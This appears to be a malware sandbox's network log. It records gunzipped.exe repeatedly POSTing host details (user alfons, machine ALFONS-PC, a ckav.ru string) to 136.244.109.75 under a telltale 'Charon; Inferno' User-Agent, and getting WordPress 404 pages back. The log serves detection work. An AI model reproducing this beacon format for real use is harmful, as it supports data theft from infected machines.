                          Apr 17, 2024 03:17:53.016868114 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:53.016906023 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:53.016946077 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:53.016988993 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:53.017029047 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:53.017071962 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:53.017112017 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:53.017152071 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:53.017190933 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          40192.168.2.549753136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:53.372678995 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:53.579726934 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:54.562074900 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:53 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:54.562139988 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:54.562231064 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:54.562268972 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:54.562309980 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:54.562346935 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:54.562386036 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:54.562423944 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:54.562464952 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:54.562509060 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          41192.168.2.549754136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:54.967221022 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:55.171137094 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:56.088845015 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:55 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:56.088908911 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:56.088946104 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:56.088982105 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:56.089024067 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
